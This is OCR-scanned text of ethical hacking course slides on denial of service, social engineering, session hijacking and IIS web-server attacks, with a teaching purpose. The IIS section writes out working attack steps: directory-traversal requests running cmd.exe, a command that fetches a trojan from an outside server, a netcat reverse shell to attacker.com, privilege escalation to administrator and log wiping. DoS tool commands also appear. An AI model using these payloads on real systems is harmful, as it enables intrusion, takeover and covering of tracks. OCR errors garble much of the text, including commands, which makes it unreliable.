passwords that are travel i ng around on the network. 

0 Sniffi ng can be active or passive. 

0 Popular attack methods include man in the middle 
attack and session hijacking 

0 On switched networks, MAC flooding and ARP spoofing 
is carried out. 
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Ethical Hacking 



ModuleVIII 
Denial Of Service 



Module Objective 



© What is a Denial Of Servi ce Attacl<? 

© What is a Distributed Denial Of Service Attack? 

© Why are they difficult to protect against? 

© Types of denial of service attacks 

© Tools for running DOS attacks 

© Tools for running DDOS attacks 

© Denial of Service Counter measures 
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I t's Rea 



On February 6th, 2000, Yahoo portal was shut down for 
3 hours. Then retailer Buy.conn I nc. (BUYX) was hit the 
next day, hours after going public. By that evening, eBay 
(EBAY), Amazon.com (AIMZN), and CNN (TWX) had 
gone darl<. And i n the morni ng, the mayhem conti nued 
with onlinebrol<er E*Trade(EGRP) and others having 
traffic to thei r sites vi rtually choked off. 

(Business Week Online, 12 February 2000) 
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What is a Denial Of Servi ce Attack? 



0 A denial of service attack (DOS) is 
an attack through which a person 
can render a system unusable or 
significantly slow down the 
system for legiti mate users by 
overloadi ng the resources, so that 
no one can access it. 

0 I f an attacker i s unabi e to gai n 
access to a machi ne, the attacker 
most probably wi 1 1 j ust crash the 
machine to accomplish a denial of 
servi ce attack. 
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Types of deni al of servi ce attacks 



© There are several general 
categories of DoS attacks. 

© Popularly, the attacks are 
divided into three classes: 

• bandwidth attacks, 

• protocol attacks, and 

• logic attacks. 
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< 5 0 



What is Distributed Denial of Service 
Attacks? 



©An attacker launches the attack 
using several machines. In this 
case, an attacker breaks i nto 
several machines, or coordinates 
with several zombies to launch 
an attack agai nst a target or 
network at the same ti me. 

©This makes it difficult to detect 
because attacks or i gi nate from 
several I P addresses. 

©If a single IP address is 
attacking a company, it can block 
that address at its fi rewal I . I f it is 
30000 this is extremely difficult. 
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Ping of Death 



^ C:\ WINNT\S¥sl:em32\cmd.e 



- ping 192.168.20.180 -I 45500 -t 



C:S>ping 192.168.20.180 -1 45500 -t 

Pinging 192.168.20.180 with 45500 bytes of data: 



bytes =45500 time=210iis 

bytes =45500 time=271ris 

bytes =45500 tirie=390ris 

bytes=45500 time=181iis 

bytes =45500 time=310iis 

bytes=45500 tirie=161ris 

bytes =45500 tirie=200ris 

bytes=45500 time=211iis 

bytes =45500 time=341iis 

bytes=45500 time=191iis 

bytes =45500 tirie=270ris 

bytes =45500 time=301ris 



bytes=45500 tirie=211ris 
bytes =45500 time=200ris 
bytes =45500 time=200ris 



t -inlxf 

F 

L 



Id 
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©An attacker sends a large 
ping packet to the vi cti m's 
machi ne. M ost OS do not 
know what to do with a 
packet that is larger than 
the maxi nnum size, it causes 
the OS to hang or crash. 

Example: Ping of Death 
causes bl ue screen of death 
in Windows NT. 

©Ping of Death uses I CMP 
to cause a denial of service 
attack agai nst a given 
system. 



Hacking Tool: SSPing 



© SSPing is a DoS tool. 

© SSPi ng program sends the victi m's computer a series of 
hi gill y fragmented, oversized I CM P data packets. 

© The computer recei vi ng the data pacl<ets lock when it 
tries to put the fragments together. 

© The result is a memory overflow which i n turn causes 
the machi ne to stop respond i ng. 

© Affects Wi n 95/ NT and M ac OS 
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Hacking Tool: Land Exploit 



0 Land Exploit is a DoS attacl< in which a program sends a 
TCP SYN pacl<et where the target and source addresses 
are the same and port numbers are the same. 

© When an attacl<er wants to attacl< a machi ne usi ng the 
land exploit he sends a packet in which the 
source/ desti nati on ports are the same. 

© M ost machi nes wi 1 1 crash or hang because they do not 
know how to handle it. 
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Hacking Tool: Smurf 



0 Smurf is a DoS attack i nvol vi ng forged I CM P packets 
sent to a broadcast address. 

0 Attackers spoof the source address on I CM P echo 
requests and sending them to an I P broadcast address. 
This causes every machi ne on the broadcast network to 
receive the reply and respond back to the source 
address that was forged by the attacker. 

1 An attacker starts a forged I CM P packet-source address 
with broadcast as the destination. 

2. A! I the nnachi nes on the segnnent receives the broadcast and 
rep! i es to the forged source address. 

3. This results in DoS due to high network traffic. 
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SYN Flood 



© SYN attack floods a targeted system with a series of SYN 
pacl<ets. 

0 Each pacl<et causes the targeted system to issue a SYN- 
ACK response, while the targeted system waits for the 
ACK that follows the SYN- ACK, it queues up all 
outstanding SYN -ACK responses on what is known as a 
backlog queue. 

© SYN-ACKs are moved of the queue only when an ACK 
comes back or when an internal timer (which is set at 
relatively long intervals) terminates the TCP three-way 
handshake 

© Oncethequeue is full, the system will ignore all 

incoming SYN requests, making the system unavailable 
for legitimate users. 
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H acki ng Tool : Wi nN uke 



© Wi nN uke works by sendi ng a packet with "Out of band" 
data to port 139 of tlie target liost. First off, port 139 is 
the NetBI OS port and does not accept packets unless 
the f I ag OOB i s set i n i ncomi ng packet. 

© The OOB standsfor OutOf Band. When the victim's 
machi ne accepts this packet, it causes the computer to 
crash a blue screen. 

© Because the program accepti ng the packets does not 
know how to appropriately handle Out Of Band data, it 
crashes. 
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Hacking Tool: J olt2 



0 J olt2 enables users across different networks to send I P 
fragment-driven denial of service attacks against 
NT/ 2000 by maki ng victi m's machi ne uti lize 100% of 
its CPU when it attempts to process the i llegal packets. 

c: \ > jolt2 12.3.4 -p 80 4.5.6.7 

© The above command launches the attack from the 
attacker's machine with a spoofed I P address of L2.3.4 
agai nst the I P address 4.5.6.7 

0 The victi m's machine CPU resources reach 100% 
causing the machine to lockup. 
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Hacking Tool: Bubonic.c 



© Bubonic.c is a DOS exploit that can be run against 
Windows 2000 machines. 

0 1 1 worl<s by randomly sendi ng TCP packets with 
random setti ngs with the goal of i ncreasi ng the load of 
the machi ne, so that it eventual I y crashes. 

c:\> bubonic 12.23.23.2 10.0.0.1 100 
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HackingTool: Targa 



0 Targa is a program that can be used to run 8 different 
Denial Of Service attacks. 

© The attacker has the option to either launch individual 
attacks or to try a! I the attacks unti litis successful . 

© Targa is a very powerful program and can do a lot of 
damage to a company's network. 
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Tools for running DDOS Attacks 



© The main tools for 
running DDOS attacl<s 



are: 


1 


Trinoo 


2. 


TFN 


3. 


Stachddraht 


4. 


Shaft 


5. 


TFN2K 


6. 


mstream 



™ Master 




Victim 



Zombies 
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DDOS - Attack Sec 



Attacker 



Attack Relays 




Backend- 
Server 
(e.g. Database) 



i 




Is 




Firewall Router Load- 
Balancer 




Web- 
Servers 
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© All of the DDOS tools follow 
this sequence. 

© M ass- intrusion Phase - 
automated tools identify 
potential systems with 
weaknesses; then root 
compromise them and install 
the DDOS software on them. 
These are the pr i mary vi cti ms. 

© DDOSAttack Phase- The 
compromised systems are 
used to run massive DOS 
against a victim site. 



© Trinoo (TrinOO) was the 
firstD DOS tool to be 
discovered. 

© Found in the wild (binary 
fornn) on Solaris 2.x 
systems compronnised by 
buffer overrun bug in 
R PC services: statd, 
cmsd, ttdbserverd. 

© Tri noo daemons were 
UDP based, password 
protected remote 
command shells running 
on compromised 
systems. 



DDOS Structure 

© The attacker controls one 
or more master servers 
by password protected 
remote command shel Is. 

© The master systems 
control multiple daemon 
systems. Tri noo cal I s the 
daemons "Beast" hosts. 

© Daemons fire packets at 
the target specified by 
the attacker. 



H acki ng Tool : Tri noo 



© Tri noo is a DDOS attack tool. It uses the foil owing TCP 
Ports: 

• Attacker to master: 27665/ tcp 

• M aster to daemon: 27444/ udp 

• Daemon to master: 31335/ udp 

© Daemons reside on the systems that launch that the 
attack, and masters control the daemon systems. 

© Si nee Tri noo uses TCP, it can be easily detected and 
disabled. 
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© Could bethought of as 'son of trinoo' 

© I mproved on some of the weaknesses of tri noo by 
addi ng different types of attacks that could be mounted 
agai nst the vi cti m site. 

© Structured I i ke tri noo with attackers, cl i ents ( masters) 
and daemons. 

© Initial system compromise allows the TFN programs to 
be installed. 



HackingTool:TFN2K 



http:// packetstorm.security.com/ di stri buted 

© TFN2K is a DDOS program which runs in distributed 
mode. There are two parts to the program: client and 
server. 

© The server (also known as zombies) runs on a machine 
i n I isteni ng mode and waits for commands from the 
client. 

• Running the server 

• ^d 

• Running the client 

• ^n -h 23.4.56.4 -c8 -i 56.3.4.5 

© This command starts an attack from 23.4.56.4 to the 
victim's computer 56.3.4.5 
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Hacking Tool: Stacheldraht 



Client Client 




0 Stacheldraht combi nes the 
features of TFN andTrinoo 
but adds encryption layer 
between daemons. 

© Stacheldraht uses TCP and 
I CM P on the fol lowi ng ports: 

Client to Handler: 16660 
TCP 

H andler to and from agents: 
65000 I CM P 
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Preventi ng DoS Attacks 



© You could do the foil owing things to nnininnizetheDoS 
attack: 

1 Effective robust design 

2. Bandwidth limitations 

3. Keep systems patched 

4. Run the least amount of services 

5. Allow only necessary traffic 

6. Block IP addresses 

© Due to the power of DoS attacks and the way they 
work, there is nothing that can be done to prevent a 
Dos attack entirely. 
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Preventing the DDoS 



1 Keep the network secure 

2. I nstall I DS (I ntrusion Detection System) 

3. Use scanning tools 

4. Run zombie tools 

I DS pattern match! ng technologies have a database of 
signatures. When it finds packets that have a given 
pattern, it sets off an alarm. 



Common I DS systems 



1 Shareware 

2. Snort 

3. Shadow 

4. Courtney 

5. Connnnercial 

6. I SS Real Secure 

7. Axent NetProwler 

8. Cisco Secure I D (Net Ranger) 

9. N etwork F I i ght Recorder 

]D. Network Security Wizard's Dragon 
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Use Scanning Tools 



© There are several tool s avai I abl e whi ch coul d detect 
whether a system is being used as a DDOS server. The 
f ol I owi ng tool s can detect TF N 2K, Tri noo and 
Stacheldraht. 

© Find_DDOS 

• ( http://ftp.cert.org.tw/ tool s/ Securi ty_ Scanner/ f i nd_ ddos/ ) 
© SARA 

• (http://www.cromwell-intl.com/security/468-netaudit.html) 

© DDoSPingv2.0 

• (http://is-it-true.org/pt/ptipsl9.shtml) 
© RID 

• (http://staff.washington.edu/dittrich/miscyddos/) 

© Zombi eZapper 

• ( http:// razor . bi ndvi ew.com/ tool s/ zombi ezapper_ form.shtml ) 
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Summary 



© Den i al of Servi ce i s a very common I y used attack 
methodology. 

© Distributed Denial Of Service using a mu It! pi i city of 
Zombie machines is an often seen attacl< methodology. 

© There are var i ous tool s avai I abl e for attackers to 
perpetrate DOS attacks. 

© Protection against DOS is difficult due to the very 
nature of the attacks. 

© Different scanning tools are avai I able to aid detection 
and pluggingof vulnerabilitiesleadingto DOS 
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Ethical Hacking 



ModulelX 

Social Engineering 



Module Objective 



© What is Social Engineering? 
© Common Types of Attacl<s 
© Social Engineering by Phone 
© Dumpster Diving 
© On line Social Engineering 
© Reverse Social Engineering 
© Policies and Procedures 
© Employee Education 
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What is Social Engineering? 



0 Social Engineering is the human side of breaking into a 
corporate network. 

0 Companies with authentication processes, firewalls, 
virtual private networks and network monitoring 
software are sti 1 1 wi de open to attacks 

0 An employee may unwitti ngly give away key 

information in an email or by answering questions over 
the phone with someone they don't know or even by 
tal ki ng about a project with co workers at a local pub 
after hours. 
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Art of Manipulation 



0 Social Engineering istheacquisition of sensitive 
information or inappropriate access privileges by an 
outsider, based upon building of inappropriate trust 
relationships with outsiders. 

© The goal of a soci al engi neer i s to tri ck someone i nto 
providing valuable information or access to that 
information. 

© It preys on qualities of human nature, such as the desire 
to be helpful, the tendency to trust people and the fear 
of getting in trouble. 
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H uman Weakness 



© People are usually the 
weakest link in the 
security chain. 

© A successful defense 



depends on havi ng good 
policies in pi ace and 
educati ng employees to 
follow the policies. 

© Social Engineering is the 
hardest form of attack to 




defend against because it 
cannot be defended with 
hardware or software 
alone. 
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Common Types of Soci al E ngi neer i ng 



© Social Engineering can 
be broken i nto two types: 
human based and 
computer based 

1 Human- based Social 
E ngi neeri ng refers to 
Derson to person 
nteraction to retrieve the 
desired information. 

2. Computer based Social 
E ngi neeri ng refers to 
havi ng computer 
software that attempts to 
retrieve the desi red 
information. 
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H uman based - 1 mpersonation 



Human based social 
engi neeri ng techni ques can 
be broadly categorized i nto: 

© Impersonation 

© Posing as Important User 

© Third- person Approach 

© Technical Support 

© I n Person 

• Dumpster Diving 

• Shoulder Surfing 
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Example 




A man calls a company help desk and 
says he's forgotten his password. 

In a panEc, he adds that If he mTsses the 
deadline on a big advertising project his 
boss might even fire him. 

The help desk worker feels sorry for him 
and quickly resets the password - 
unwittingly giving the hacker clear 
entrance Into the corporate network. 
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Example 



A man is in bacit of the building 




loading the company's paper recycling 
bins into the back of a truclt. Inside 
the bins are lists of employee titles 
and phone numbers, marketing plans 
and the latest company f inancials. 




This information is sufficient to 
launch social engineering attack on 
the company. 
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Computer Based Social Engineering 



© These can be divided into 
the foil owing broad 
categories: 

• Mail / IM attach nnents 

• Pop- up Windows 

• Websites/ Sweepstakes 

• Spann M ai I 
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iMessage Edit View fomsSt Optlom Tods 


1 # # 

1 Send E^tpress Queue Save 


Attach Headsf^ 


5;peS Check Check Ad( 


T« 1 d 

CC: 1 =j 

SubjKt: |Cool Photo of Anna KouriADva 


i 



How was your holidays? Please take a [ook at the censored Anna 
Kourmkova image. 

Best regards. 




Note; We will credit your account with • :■•-( 

deposit to a maximun-i of The bonus on Last Name' I 

Vour initial deposit can not be cashed out until you have ' I 

wagered an amount equal to your initial deposit. 

Acc^s to Canadian .^sidenb and those under 18 is Birth-Date : | ( MMDDYTrr ) 
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Reverse Social Engineering 



0 M ore advanced method of gaining illicit information is 
known as "reverse social engineering" 

© This is when the hacker creates a persona that appears 
to be i n a position of authority so that employees wi 1 1 
ask him for information, rather than the other way 
around. 

© The three parts of reverse soci al engi neeri ng attacks are 
sabotage, adverti si ng and assi sti ng. 
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Policies and Procedures 



© Policy is the most critical component to any information 
security program. 

0 Good policies and procedures are not effective if they 
are not taught and rei nforced to the employees. 

© They need to be taught to emphasize thei r i mportance. 
After receiving training, the employee should sign a 
statement acknowledgi ng that they understand the 
policies. 
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Security Policies - Checklist 



© Account Setup 
© Password change policy 
© Help desk procedures 
© Access Privileges 
© Violations 

© E mpl oyee i denti f i cati on 
© Privacy Policy 
© Paper documents 
© Modems 

© Physical Access Restrictions 
© Virus control 
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Summary 



© Social Engineering is the human side of breaking into a 
corporate network. 

0 Social Engineering involves acquiring sensitive 
information or inappropriate access privileges by an 
outsider. 

© H uman- based Social Engi neeri ng refers to person to 
person i nteracti on to retr i eve the desi red i nf or mati on . 

0 Computer based Soci al Engineering refers to having 
computer software that attempts to retri eve the desi red 
information 

0 A successful defense depends on having good policies in 
pi ace and diligent implementation. 
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Ethical Hacking 



ModuleX 
Session Hijacking 



Module Objective 



© Spoof i ng Vs H i j acki ng 

© Types of session hijacking 

© TCP/ 1 P concepts 

© Performing Sequence prediction 

© ACK Storms 

© Session Hijacking Tools 
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Understanding session hijacl<ing 



© Understanding the flow 
of message packets over 
the I nternet by dissecti ng 
the TCP stack. 

© Understanding the 
security issues involved 
i n the use of I Pv4 
standard 

© Familiarizing with the 
basi c attacks possi bl e 
due to the I Pv4 standard. 



Virtual Connection 



Application Layer 



Transport Layer 



Network Layer 



Data Link Layer 





D 
E 



Application Layer 



Transport Layer 



Network Layer 



T 
I 

'c 

A 
L 



Hardware ; ( Hardware 

Actual Connect ion 



Data Link Layer 
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Spoof i ng Vs H i j acki ng 



A spoofing attack is different from a hijack in that an 
attacker is not actively taking another user offline to 
perform the attack, he pretends to be another user or 
machi ne to gai n access. 
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Spoof i ng Vs H i j acki ng 



With H i jacking an attacker is taking over an existing 
session, which means he is relying on the legitimate 
user to make a connection and authenticate. Then take 
over the session. 




Attacker 
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steps in Session H ijacking 



1 Tracki ng the 



session 



2. Desynchronizing 
the connection 

3. Injecting the 
attacl<er's pacl<et 
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Types of sessi on H i j acki ng 



There are two types of hi j acki ng attacl<s: 
© Active 

• I n an active attack, an attacker fi nds an active 
session and takes over. 

© Passive 

• W i th a passi ve attack, an attacker h i j acks a sessi on , 
but sits back and watches and records a! I of the 
traffic that is bei ng sent forth. 
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TCP Concepts 3 Way H andshake 



1 Bob I nitiates a connection with the server. Bob sends a 
packet to the server with SYN bit set. 

2. The server receives this pacl<et and sends bacl< a pacl<et 
with the SYN bit and an I SN (I nitial Sequence Number) 
for the server. 

3. Bob sets the ACK bit acl<nowledging the receipt of the 
pacl<et and i ncrennents the sequence number by 1 

4. The two machi nes have successful! y estabi i shed a 
session. 
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Sequence Numbers 



0 Sequence N umbers are very i mportant to provi de 
reliable communication but they are also crucial to 
hijacking a session. 

0 Sequence numbers are a 32- bit counter, which means 
the val ue can be any of over 4 bi 1 1 i on possi bl e 
combinations. 

0 The sequence numbers are used to tel I the recei vi ng 
machi ne what order the packets should go i n when they 
are received. 

0 Therefore an attacker must successful I y guess the 
sequence number to hijack a session. 

BZ-Council 



Programs that perform Session H ijacking 



There are several 
programs avai I abl e that 
perform session 



hijacking. 

F ol I owl ng are a few that 
belongs to this category: 

• J uggernaut 

• Hunt 




• TTY Watcher 

• IP Watcher 

• T-Sight 
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H acki ng Tool : J uggernaut 



0 J uggernaut is a network sniffer that can be used to 
hijack TCP sessions. It runs on Linux Operating 
systems. 

© J uggernaut can be set to watch for al I network traffic or 
it can be given a keyword I i ke password to look out for. 

© The main function of this program is to maintain 
information about various session connections that are 
occurri ng on the network. 

© The attacker can see al I the sessions and he can pick a 
session he wants to hijack. 
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Hacking Tool: Hunt 



http:// 1 i n.f si d. cvut.cz/ ^kra/ i ndex.htnnl 

0 H unt is a program that can be used to I isten, i ntercept, 
and hijack active sessions on a network. 

© Hunt Offers: 

• Connection management 

• ARP Spoofing 

• Resetting Connection 

• Watching Connection 

• MAC Address discovery 

• Sniffing TCP traffic 
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H acki ng Tool : TTY Watcher 



http://www.cerias.purdue.edu 

© TTY-watcher is a utility to monitor and control users on 
a single system. 

© Shari ng a TTY. Anythi ng the user types i nto a 

monitored TTY wi ndow wi 1 1 be sent to the underiyi ng 
process. I n this way you are sharing a login session with 
another user. 

© After a TTY has been stolen, it can be returned to the 
user as though nothing happened. 

(Aval I able only for Sun Solaris Systems.) 
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H acki ng Tool : I P watcher 



http://engarde.conn 

© I P watcher is a commercial session hijacking tool that 
allows you to monitor connections and has active 
countermeasures for taking over a session. 

© The program can monitor all connections on a network 
al I owi ng an attacker to di spl ay an exact copy of a 
sessi on i n real - ti me, j ust as the user of the sessi on sees 
the data. 
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T- Sight 



http://engarde.conn 

© T- Sight an advanced intrusion investigation and 
response tool for Windows NT and Windows 2000 can 
assist you when an attempt at a break- in or compromise 
occurs. 

© With T-sight you can monitor all your network 
connections (i.e. traffic) in real-time and observe the 
composition of any suspicious activity that takes place. 

© T-Sight has the capability to hijack any TCP sessions on 
the network. 

© Due to security reasons E ngarde Systems I i censes thi s 
software to pre-determined I P address. 
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Remote TCP Session Reset Utility 



Remote TCP Session Reset 



File Edit Session Help 



y 

Export 



Print 



Refresh 



Break 



f 

Help 




Router, Switch or Server Name / IP 
Read-Write Community String 



10.32.0.254 



private 



3 



Connect 



Connection State 


Server IP Address 


Server Port 


Client IP Address 


Client Port 


Established 


216.60.1 97.254 






208.1 91 .22.50 






1 Established 


216.60.1 97.254 


23 




208.1 91 .22.50 


3530 






TCP Session Table download complete. 
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Dangers posed by H ijacking 



1 M ost computers are vul nerabi e 

2. Little can be done to protect against it 

3. Hijacking is simple to launch 

4. M ost countermeasures do not work 

5. H i j acki ng i s very dangerous. 
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Protecti ng agai nst Sessi on H i j acki ng 



1 Use Encryption 

2. U se a secu re protocol 

3. Limit incoming connections 

4. M i n i mi ze remote access 

5. H ave strong authenti cati on . 
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Summary 



© I n the case of a sessi on hi j acki ng an attacker rel i es on 
the legiti mate user to connect and authenticate and 
then take over the session. 

© I n spoof! ng attack, the attacker pretends to be another 
user or machine to gain access. 

© Successful session hi jacking is extremely difficult and 
only possi ble when a number of factors are under the 
attacker's control . 

© Session hijacking can be active or passive in nature 
depend i ng on the degree of i nvol vement of the attacker 
i n the attack. 

© A var i ety of tool s exi st to ai d the attacker i n 
perpetrating a session hijack. 

© Session H i jacking could be very dangerous and there is 
a need for implementing strict counter measures. 
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Ethical Hacking 



ModuleXI 

H acki ng Web Servers 



Module Objective 



©I ntroduction to Web Servers 

©Popular Web Servers and common Vulnerabilities 

©Apache Web Server Security 

©Sun ONE Web Server Security 

©IIS Server Security 

©Attacks agai nst Web Servers 

©Tools used in Attack 

© Cou nter measu res 
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H ow Web Servers Work 



I The browser breaks the URL 
into three parts: 

1 The protocol ("http") 

2. The server name 
("www.website.conn") 

3. The file name 
("webpagehtml") 

2. The browser conrimunicates 
with a name server, which 
translates the server name, 
www. websi te. com , into an I P 
address 

3. The browser then forms a 
connection to the Web server 
at that I P address on port 80. 
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4. Following the HTTP 
protocol, the browser 
sends a GET request to 
the server, aski ng for the 
file http://webpage.html . 

5. The server sends the 
HTML text for the Web 
page to the browser. 

6. The browser reads the 
HTM L tags and formats 
the page onto the screen. 



Popular Web Servers and Common Security 
Threats 



0 Apache Web Server 

© I IS Web Server 

0 Sun ONE Web Server 

© N ature of Security Threats i n a Web Server 
Environment. 

• B ugs or Web Server M i sconf i gu rati on . 

• Browser- Side or Client Side Risks. 

• Sniffing 

• Den i a! of Servi ce Attacl<. 
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Apache Vul nerabi I ity 



0 The Apache Week tracks the vulnerabilities in Apache 
Server. Even Apache has its share of bugs and fixes. 

© For instance, consider the vulnerability which was found 
in the Win32 port of Apache 13.20. 

• Long URLs passi ng through the mod_ negative, 
mod_dir and mode_ autoi ndex modules could cause 
Apache to I i st di rectory contents. 

• The concept is simple but requires a few trial runs. 

• A URL with a large number of trailing slashes: 

- /cgi-bin /////////////// 1 1 1 1 1 1 1 1 1 1 1 1 1 could produce 
di rectory I i sti ng of the ori gi nal di rectory. 
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Attacks agai nst 1 1 S 



0 1 1 S i s one of the most wi del y used Web server 
platforms on the I nternet. 

© M 1 crosoft's Web Server has been the frequent target 
over the years. 

© It has been attacked by various vulnerabilities. 
Examples include: 

• : : $ DATA vu I n er abi I i ty 

• showcodaasp vul nerabi I ity 

• Pi ggy back! ng vul nerabi I ity 

• Privilege command execution 

• Buffer Overflow exploits (I I Shack.exe) 
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1 1 S Components 



© I IS relies heavily on a collection of DLLs that work 
together with the main server process, inetinfo.exe, to 
provi de var i ous capabi I i ti es. 

© Example: Server side scripting, Content I ndexing, Web 
Based printing etc. 

© This architecture provides attackers with different 
f uncti onal i ty to expl oi t vi a mal i ci ous i n put. 
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ISAPI DLL Buffer Overflows 



0 One of the most extreme security vul nerabi I i ties 
associated with I SAP I DLLs is the buffer overflow. 

© I n 200 X 1 1 S servers were ravaged by versions of the 
Code Red and Nimda worms which were both based on 
buffer overflow exploits. 
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IPP Printer Overflow 



© There is a buffer overflow i n 1 1 S withi n the I SAPI fi Iter 
that handles .printer files 

(c:\winnt\systenn32\nnsw3prt.dll) that provides support 
for the I nternet Printing Protocol (IPP) 

0 I PP enables the web- based control of various aspects of 
networked pri nters. 

© The vulnerability arises when a buffer of approximately 
420 bytes is sent within the HTTP host. 

G ET / N U L L . pr i nter H TTP/ 1 0 H OST : [ buffer] 
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H acki ng Tool : 1 1 SH ack.exe 



0 i i shack.exe overf I ows a buffer used by 1 1 S http daemon, 
al lowi ng for arbitrary code to be executed. 

c:\ iishackwww.yourtarget.conriSO 
www. you r server . com/ thet r oj an . exe 

0 www.yourtarget.com is the 1 1 S server you're hacl<ing,80 is 
the port its listening on, www.yourserver.com is some 
webserver with your trojan or custom script (your own, or 
another), and / thetrojan.exe is the path to that script. 

CHS 4-0 remote buffer ouerflou exploits 

<c> dark spyrit — barns0eeye -cdpi. 
http : //uuu . eEve . com 

[usage: iishack <host> <port> <url>] 

eg - iishack uuw. example .con 80 uwu.mi/server .com/thetrojan .exe 
do not include 'http://' before hosts? 



No host or IP specified. 
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I PP Buffer Overflow Countermeasures 



© I nstal 1 1 atest servi ce pack from M i crosoft. 

© Remove I PP pri nti ng from 1 1 S Server 

© I nstal I firewall and remove unused extensions 

© I mpl ement aggressi ve network egress f i I ter i ng 

© Use 1 1 SLockdown and URLScan utilities 

© Regularly scan your network for vul nerable servers 



ISAPI DLL Source disclosures 



© M icrosoft 1 1 S 4.0 and 5.0 can be made to disclose 
fragments of source code which should otherwise be i n 
accessible. 

© This is done by appendi ng "+.htr" to a request for a 
known .asp (or .asa, .ini, etc) file. 

© appending this string causes the request to be handled 
by I SM .DLL, which then strips the '+.htr' string and 
may disclose part or al I of the source of the .asp fi le 
specified in the request. 
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SAPI.DLL Exp oit 



© H ere's a sampl e f i I e cal I ed htr .txt that you can pi pe 
through a netcatto exploit the I SAP I .DLL vulnerability. 

• GET/siteVglobal.asa+.htr HTTP/10 

• [CRLF] 

• [CRLF] 

© Piping through netcat connected to a vulnerable server 
produces the following results: 

c:\ >nc -wwww.victim.com 80 <htr.txt 
HTTP/ 11200 OK 
Server: M icrosoft -IIS/ 5.0 

<! ~f 1 1 ename = gl obal .asa - > ( "Prof! I es_ Connect! onStri ng") 
"DSN=Profiles; UID^ompany_user; 



C 



password =secret 



Password 
Revealed 
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S Directory Traversal 



© The vulnerability results because of a canon i call zati on 
error affecting CGI scripts and I SAP I extensions (.ASP 
is probably the best known I SAP I - mapped file type.) 

© canon i call zati on istheprocessby which various 
equivalent forms of a name can be resolved to a si ngle, 
standard name. 

© For example, "%cO%af" and "%cl%9c" areoverlong 
representations for ?/? and ?\? 

© Thus, by feeding the HTTP request I ike the foil owing to 
1 1 S, arbitrary commands can be executed on the server: 

© GET/ scri pts/ . .%cO%af . ./ wi nnt/ system32/ cmd.exe?/ c+ 
dir=c:\ HTTP/ 10 
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Unicode 



© ASCI I characters for the dots are replaced with 
hexadecimal equivalent (%2E). 

0 ASCI I characters for the slashes are replaced with 
Unicode equivalent (%cO%af). 

© Unicode 2.0 al I ows nnu I ti pie encoding possibilities for 
each characters. 

© Unicodefor "/": 2f, cOaf, eOSOaf, f08080af, 
f8808080af, 

© Overlong Unicode are NOT malformed, but not allowed 
by a correct U nicode encoder and decoder. 

© M al iciously used to bypass fi Iters that only check short 
Unicode. 
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1 1 S Logs 



0 llSlogsall the visits in logfiles. The log file is located at 
<%systennroot%>\ I ogf i I es 

0 Be careful . I f you don't use proxy, then your I P wi 1 1 be 
logged. 

0 This command lists the log files: 

http:/ / vi cti m.com/ scri pts/ . .%cO%af . ./ . .%cO%af . ./ . .%cO 
%af . ./ . .%cO%af . ./ . .%cO%af . ./ . .%cO%af . ./ . .%cO%af . ./ . .% 
cO%af . ./ wi nnt/ system32/ cmd.exe?/ c+di r+C:\ Wi nnt\ sy 
stem32\ Logf i I es\ W3SVC1 
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Hacking Tool: IISxploit.exe 



This tool automates directory traversal exploit in 1 1 S 




3 



jnverable 
Upload File 



le to run(e.g. 




iFile to rename Whole address 
^^^^^^^JlLtHt: 

iRename to: 



File to Delete Whole address (e.g. 
CAtest\tent.tnt]: 




V'GeoCHles 2j^\y<.\ 

Click Here 
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Hacking Tool: execiis-win32.exe 



This tool exploits 1 1 S directory traversal and takes 
command from cmd and executes them on the 1 1 S 
Server 



C:\WINDOWS\System32kmd.exe - execiis-win32juggyboy.com dir c:\ 



- □ 




C:\Docuiients and SettingsSOunerNM*/ DocunentsSEthical Hacking Lab Files u2\Modu 
11 - Hacking Ueb Servers >execiis-win32 jugg^bov-con dir c:S 
iisexec.c ! Microsoft IIS CGI Filenane Decode Error I 
<f ilipl^securax . be > 

— Socket created. 

— Connection made. 

[GET /scripts/. .'/.2SSc. .K255cwinnt/si|sten32/cnd.exe?/c + 
] 



2iA 
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Hacking Tool: Unicodeuploader.pl 



© Unicode upload creator (unicodeloader.pl) works as 
follows: 

Two files (upload.asp and upload. inc- have them in 
thesamedir asthePERL script) are built in the 
webroot (or any where else) usi ng echo and some 
conversion strings. These files allow you to upload any 
f i le by si mply surf i ng with a browser to the server. 

1 Find the webroot 

2. perl unicodeloader target: 80 'webroot' 

3. surf to target/ upload.asp and upload nc.exe 

4. perl unicodexecute3.pl target: 80 'webroot/ nc -I -p 80 -e 
cmd.exe' 

5. telnet target 80 

Above procedure wi 1 1 drop you i nto the shel I on the box. 
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Hacking Tool: cmdasp.asp 



© After upl oadi ng nc.exe to the web server, you can 
shovel a shell back to your pc. 

© Shovel i ng a shel I back to the attacker's system i s easy: 

1 Start a netcat I i stener on the attacker's system: 
c:\>nc.exe-l -p 2002 

2. U se cmdasp.asp to shovel a netcat shel I back to the 
listener: 

c:\ i nel:pub\ scri pts\ nc.exe - v -e cmd.exe attacker.com 
2002 
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Escalating Privileges on IIS 



0 On 1 1 S 4, the LPC ports can be exploited using hk.exe 

© hk.exe will run connnnands using SYSTEM account on 
wi ndows pertai ni ng to i ntruders to si mply add the I U SR 
orlWAM account to the local administrator's group. 

hk.exe net localgroup administrators 
IUSR_machinename /add 

© Note: LPC port vulnerability is patched on 1 1 S 5.0 
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Hacking Tool: iiscrack.dll 



© iiscrack.dll works like upload.asp and cmd.asp. 

© i i scrack.dl I provi des a form- based i nput for attackers to 
enter commands to be run with SYSTEM privileges. 

© An attacker could renameiiscrack.dll to idq.dll, upload 
thetrojan DLL to c:\inetpub\scripts using 

upload.asp and execute it via the web browser using: 

http : / /victim. com/script s/idq . dll 

© The attacker now has the option to run vi rtual ly any 
command as SYSTEM 
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Hacking Tool: ispc.exe 



© I SPC.exe is a Win32 client that is used to connect a 
trojanlSAPI DLL (idq.dll). 

© Oncethetrojan DLL iscpied to the victim webserver 
(/sripts/ idq.dll), the attacker can execute ispc.exe and 
imnnediately obtain a remote shell running as SYSTEM. 

c : \>ispc . exe victim. com/ scripts/ idq. dll 
80 
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Unspecified Executable Path 
Vulnerability 



© When executables and DLL files are not preceded by a 
Dath i n the registry (eg. explorer.exe does not have a 
'ixed path by default). 

© Windows NT 4.0/ 2000 will search for the file in the 
following locations in this order: 

• thedirectoryfrom which the application loaded. 

• the current di rectory of the parent process, 

• . . .\ systenn32 

• ...\ system 

• the windows directory 

• the directories specified in the PATH environment 
variable 
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Hacking Tool: CleanllSLog 



©This tool cl ears the I og entr i es i n the 1 1 S I og f i I es f i I tered 
by I P address. 

0 An attacker can easi ly cover his trace by removi ng 
